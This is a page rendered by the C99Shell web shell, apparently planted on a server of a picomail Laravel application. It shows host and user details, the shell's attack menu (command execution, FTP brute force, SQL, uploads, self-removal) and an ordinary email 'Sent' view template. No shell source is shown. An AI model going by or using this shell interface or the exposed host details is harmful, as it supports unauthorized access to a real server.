!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/resources/views/customer/emailbox/   drwxr-xr-x
Free 29.13 GB of 117.98 GB (24.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     sent.blade.php (7.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.customer')

@section('title','Sent | EmailBox')

@section('extra-css')

    <style>
        .mailbox-fail {
            color: red;
        }
    </style>
@endsection

@section('content')

    <!-- Content Header (Page header) -->
    <section class="content-header">
        <div class="container-fluid">
            <div class="row mb-2">
                <div class="col-sm-6">
                    <h1>Sent</h1>
                </div>
                <div class="col-sm-6">
                    <ol class="breadcrumb float-sm-right">
                        <li class="breadcrumb-item"><a
                                href="{{route('customer.emailbox.inbox')}}">{{trans('customer.emailbox')}}</a></li>
                        <li class="breadcrumb-item active">{{trans('customer.sent')}}</li>
                    </ol>
                </div>
            </div>
        </div><!-- /.container-fluid -->
    </section>

    <!-- Main content -->
    <section class="content">
        <div class="row">
            <div class="col-md-3">
                <a href="{{route('customer.emailbox.compose')}}"
                   class="btn btn-primary btn-block mb-3">{{trans('customer.compose')}}</a>

                @include('customer.emailbox.common')
            </div>
            <!-- /.col -->
            <div class="col-md-9">
                <div class="card card-primary card-outline">
                    <div class="card-header">
                        <h3 class="card-title">{{trans('customer.sent')}}</h3>

                        <div class="card-tools d-none">
                            <div class="input-group input-group-sm">
                                <input type="text" class="form-control" placeholder="{{trans('customer.search_mail')}}">
                                <div class="input-group-append">
                                    <div class="btn btn-primary">
                                        <i class="fas fa-search"></i>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- /.card-tools -->
                    </div>
                    <!-- /.card-header -->
                    <div class="card-body p-0">
                        <div class="mailbox-controls">
                            <!-- Check all button -->
                            <button data-checked="false" id="checkbox-toggle" type="button"
                                    class="btn btn-default btn-sm checkbox-toggle"><i
                                    class="far fa-square"></i>
                            </button>
                            <div class="btn-group">
                                <button data-message="{{trans('customer.messages.move_trash')}}"
                                        data-action="{{route('customer.emailbox.sent.trash')}}"
                                        data-input=''
                                        data-toggle="modal" data-target="#modal-confirm"
                                        id="move-trash"
                                        type="button" class="btn btn-default btn-sm"><i class="far fa-trash-alt"></i>
                                </button>
                            </div>
                            <!-- /.btn-group -->
                            <button type="button" class="d-none btn btn-default btn-sm"><i class="fas fa-sync-alt"></i>
                            </button>
                            <div class="float-right d-none">
                                1-50/200
                                <div class="btn-group">
                                    <button type="button" class="btn btn-default btn-sm"><i
                                            class="fas fa-chevron-left"></i></button>
                                    <button type="button" class="btn btn-default btn-sm"><i
                                            class="fas fa-chevron-right"></i></button>
                                </div>
                                <!-- /.btn-group -->
                            </div>
                            <!-- /.float-right -->
                        </div>
                        <div class="table-responsive mailbox-messages">
                            <table class="table table-hover table-striped">
                                <thead>
                                <td>
                                <th>{{trans('customer.from')}}</th>
                                <th>{{trans('customer.to_email')}}</th>
                                <th>{{trans('customer.message')}}</th>
                                <th>{{trans('customer.failed')}}</th>
                                <th>{{trans('customer.schedule_at')}}</th>
                                </td>
                                </thead>
                                <tbody>
                                @if($messages->isNotempty())
                                @foreach($messages as $message)
                                    <tr>
                                        <td>
                                            <div class="icheck-primary">
                                                <input class="check-single" data-id="{{$message->id}}" type="checkbox"
                                                       id="check-{{$message->id}}">
                                                <label for="check-{{$message->id}}"></label>
                                            </div>
                                        </td>
                                        <td class="mailbox-name">
                                            <div class='show-more'>
                                                {{$message->formatted_email_from}}
                                            </div>
                                        </td>
                                        <td class="mailbox-name">
                                            <div class='show-more'>
                                                {{$message->formatted_email_to}}
                                            </div>
                                        </td>
                                        <td class="mailbox-subject">
                                            <div class="show-more-message" style="min-width: 200px">
                                                {{$message->body}}
                                            </div>
                                        </td>
                                        <td class="mailbox-fail">
                                            <div class='show-more'>

                                            </div>
                                        </td>
                                        <td class="mailbox-subject">{{$message->schedule_datetime}}</td>
                                    </tr>
                                @endforeach
                                @else
                                    <tr class="text-center">
                                        <td colspan="6">No data available</td>
                                    </tr>
                                @endif
                                </tbody>
                            </table>

                            <div class="float-right"> {{$messages->links("pagination::bootstrap-4")}} </div>
                            <!-- /.table -->
                        </div>
                        <!-- /.mail-box-messages -->
                    </div>
                    <!-- /.card-body -->
                </div>
                <!-- /.card -->
            </div>
            <!-- /.col -->
        </div>
        <!-- /.row -->
    </section>
    <!-- /.content -->


@endsection

@section('extra-scripts')
    <script src="{{asset('js/customer/sent.js')}}"> </script>

@endsection


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--